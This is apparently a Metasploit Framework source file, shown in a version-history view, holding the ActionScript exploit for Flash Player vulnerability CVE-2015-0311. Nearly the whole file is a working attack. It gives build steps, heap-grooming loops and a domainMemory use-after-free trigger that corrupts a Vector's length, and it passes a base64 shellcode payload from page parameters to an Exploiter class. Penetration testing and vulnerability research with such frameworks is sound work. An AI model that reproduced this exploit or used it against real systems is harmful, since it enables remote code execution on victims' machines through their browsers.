metasploit-framework/external/source/exploits/CVE-2015-0311/Exploit.as

69 lines
2.4 KiB
ActionScript
Raw Normal View History

2015-05-21 19:58:38 +00:00
// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
// 5. Build with: mxmlc -o msf.swf Exploit.as
// Original exploit by @hdarwin89 // http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/
package
{
import flash.display.Sprite
import flash.display.LoaderInfo
import flash.system.ApplicationDomain
import flash.utils.ByteArray
import avm2.intrinsics.memory.*
import flash.external.ExternalInterface
import mx.utils.Base64Decoder
public class Exploit extends Sprite
{
private var data:uint = 0xdeaddead
private var uv:Vector.<uint> = new Vector.<uint>
private var ba:ByteArray = new ByteArray()
private var exploiter:Exploiter
private var b64:Base64Decoder = new Base64Decoder()
2015-06-04 17:12:49 +00:00
private var payload:ByteArray
2015-05-21 19:58:38 +00:00
private var platform:String
2015-06-04 17:12:49 +00:00
private var os:String
2015-05-21 19:58:38 +00:00
public function Exploit()
{
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
2015-06-04 17:12:49 +00:00
os = LoaderInfo(this.root.loaderInfo).parameters.os
2015-05-26 20:18:01 +00:00
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
2015-06-04 17:12:49 +00:00
b64.decode(b64_payload)
payload = b64.toByteArray()
2015-05-21 19:58:38 +00:00
2015-06-04 17:12:49 +00:00
// defrag
for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
2015-05-21 19:58:38 +00:00
for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
ba.compress()
ApplicationDomain.currentDomain.domainMemory = ba
ba.position = 0x200
for (i = 0; i < ba.length - ba.position; i++) ba.writeByte(00)
try {
ba.uncompress()
} catch (e:Error) { }
2015-06-04 17:12:49 +00:00
uv = new Vector.<uint>(0x3e0)
uv[0] = 0
2015-05-21 19:58:38 +00:00
var test:uint = li32(0)
if (test == 0x3e0) {
si32(0xffffffff, 0) // corrupted
} else {
Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
return // something failed
}
2015-06-04 17:12:49 +00:00
exploiter = new Exploiter(this, platform, os, payload, uv)
2015-05-21 19:58:38 +00:00
}
}
}